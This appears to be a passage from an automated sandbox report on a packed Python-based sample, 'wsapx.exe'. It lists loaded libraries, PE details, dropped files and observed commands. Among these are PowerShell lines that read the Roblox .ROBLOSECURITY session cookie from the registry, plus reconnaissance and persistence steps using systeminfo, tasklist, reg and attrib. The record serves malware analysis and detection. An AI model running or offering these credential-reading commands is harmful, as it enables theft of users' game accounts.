              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: wsapx.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: wsapx.exeStatic file information: File size 7839456 > 1048576
              Source: wsapx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: wsapx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: wsapx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: wsapx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: wsapx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: wsapx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: wsapx.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: wsapx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: wsapx.exe, 00000002.00000002.2671964478.00007FFDA5491000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: wsapx.exe, 00000002.00000002.2667746115.00007FFD941D4000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: wsapx.exe, 00000002.00000002.2668800317.00007FFD9472F000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: wsapx.exe, 00000002.00000002.2670829170.00007FFDA34C1000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: wsapx.exe, 00000002.00000002.2672233882.00007FFDA57F7000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdbEE source: wsapx.exe, 00000002.00000002.2669708015.00007FFDA3395000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 3.0.11 19 Sep 20233.0.11built on: Wed Sep 27 22:33:28 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"userSDIR: "C:\Program Files\OpenSSL\lib\users-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC;CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_push_octet_ptrOSSL_PARAM_BLD_to_param..\s\crypto\params.c source: wsapx.exe, 00000002.00000002.2666718070.00007FFD93C42000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: wsapx.exe, 00000002.00000002.2670568428.00007FFDA346C000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: wsapx.exe, wsapx.exe, 00000002.00000002.2666718070.00007FFD93C42000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: :C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.pdb source: powershell.exe, 00000041.00000002.2442904993.000001FAD38A5000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: wsapx.exe, 00000002.00000002.2671564113.00007FFDA4DA1000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: wsapx.exe, 00000002.00000002.2670568428.00007FFDA346C000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: wsapx.exe, 00000002.00000002.2671361825.00007FFDA46D1000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: wsapx.exe, 00000000.00000003.2148160549.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2673030772.00007FFDAC071000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: wsapx.exe, 00000000.00000003.2148160549.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2673030772.00007FFDAC071000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: wsapx.exe, wsapx.exe, 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: wsapx.exe, 00000002.00000002.2671081584.00007FFDA4331000.00000040.00000001.01000000.0000000E.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: wsapx.exe, 00000002.00000002.2670348004.00007FFDA3421000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdb source: wsapx.exe, 00000002.00000002.2669708015.00007FFDA3395000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: :C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.pdbhP source: powershell.exe, 00000041.00000002.2442904993.000001FAD38A5000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmp, rar.exe, 0000006E.00000000.2528171463.00007FF60E630000.00000002.00000001.01000000.00000021.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: wsapx.exe, 00000002.00000002.2670091498.00007FFDA33E1000.00000040.00000001.01000000.00000010.sdmp
              Source: wsapx.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: wsapx.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: wsapx.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: wsapx.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: wsapx.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              barindex
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.cmdline"
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD93D97B30 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,2_2_00007FFD93D97B30
              Source: _ctypes.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x169f0
              Source: unicodedata.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x53022
              Source: _bz2.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x170f7
              Source: libffi-8.dll.0.drStatic PE information: real checksum: 0x0 should be: 0xa1d1
              Source: _ssl.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x150ed
              Source: sqlite3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x9f7df
              Source: wsapx.exeStatic PE information: real checksum: 0x77c476 should be: 0x783a99
              Source: python312.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x1ca53b
              Source: libcrypto-3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x192b2f
              Source: _queue.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xcac1
              Source: _socket.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x10668
              Source: _decimal.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x226ba
              Source: _hashlib.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x9cd5
              Source: libssl-3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x396d1
              Source: select.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x100e6
              Source: _lzma.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x23988
              Source: uses4c50.dll.73.drStatic PE information: real checksum: 0x0 should be: 0x60ef
              Source: _sqlite3.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1149b
              Source: libffi-8.dll.0.drStatic PE information: section name: UPX2
              Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD946282D8 push rdi; iretd 2_2_00007FFD946282DA
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD94628DBF push rsp; retf 2_2_00007FFD94628DC0
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD94625EB4 push rsp; iretd 2_2_00007FFD94625EB5
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD94625FB9 push r10; ret 2_2_00007FFD94625FCC
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD9462808B push r12; iretd 2_2_00007FFD9462809F
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD94627689 push r12; ret 2_2_00007FFD946276CD
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD94625F7B push r8; ret 2_2_00007FFD94625F83
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD94625E67 push rdi; iretd 2_2_00007FFD94625E69
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD94627F67 push rbp; iretq 2_2_00007FFD94627F68
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD94625F56 push r12; ret 2_2_00007FFD94625F73
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD94626859 push rsi; ret 2_2_00007FFD94626890
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD9462763E push rbp; retf 2_2_00007FFD94627657
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD94628F42 push rsp; iretq 2_2_00007FFD94628F43
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD94625C31 push r10; ret 2_2_00007FFD94625C33
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD94629327 push rsp; ret 2_2_00007FFD94629328
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD94625E18 push rsp; ret 2_2_00007FFD94625E1C
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD94628419 push r10; retf 2_2_00007FFD94628485
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD94627FFF push r12; ret 2_2_00007FFD9462804A
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD94625F01 push r12; ret 2_2_00007FFD94625F10
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD94625D06 push r12; ret 2_2_00007FFD94625D08
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD94625CED push rdx; ret 2_2_00007FFD94625CF7
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD94625DF7 push r10; retf 2_2_00007FFD94625DFA
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD94625CE0 push r10; retf 2_2_00007FFD94625CE2
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD94625CE5 push r8; ret 2_2_00007FFD94625CEB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD3231D2A5 pushad ; iretd 11_2_00007FFD3231D2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD324383FC push ebx; ret 11_2_00007FFD3243847A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD324385FB push ebx; ret 11_2_00007FFD3243860A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD3243860B push ebx; ret 11_2_00007FFD3243860A
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1

              Persistence and Installation Behavior

              barindex
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: "C:\Users\user\Desktop\wsapx.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Users\user\Desktop\wsapx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73722\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\wsapx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73722\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\wsapx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73722\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\wsapx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73722\sqlite3.dllJump to dropped file
              Source: C:\Users\user\Desktop\wsapx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73722\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\wsapx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73722\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\wsapx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73722\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\wsapx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73722\libffi-8.dllJump to dropped file
